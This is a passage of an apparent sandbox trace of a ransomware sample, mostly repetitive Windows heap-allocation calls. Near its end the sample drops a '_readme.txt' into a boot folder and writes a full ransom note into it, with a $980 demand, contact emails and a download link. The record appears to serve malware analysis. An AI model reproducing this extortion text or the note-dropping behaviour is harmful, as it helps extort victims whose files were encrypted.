dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.705] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.705] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.706] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.706] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.707] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.707] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.708] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.708] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.709] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.709] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.710] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.710] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.711] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.711] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.712] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0228.712] PathFindFileNameW (pszPath="C:\\Boot\\tr-TR\\") returned="tr-TR\\" [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.712] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.712] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.712] PathFindFileNameW (pszPath="") returned="" [0228.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd450 [0228.712] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.713] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x3b78058 [0228.713] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x3466428 [0228.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.713] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.713] PathAppendW (in: pszPath="C:\\Boot\\tr-TR\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 1 [0228.713] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.713] PathFileExistsW (pszPath="C:\\Boot\\tr-TR\\_readme.txt") returned 0 [0228.714] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x3b7b818 [0228.714] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.714] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 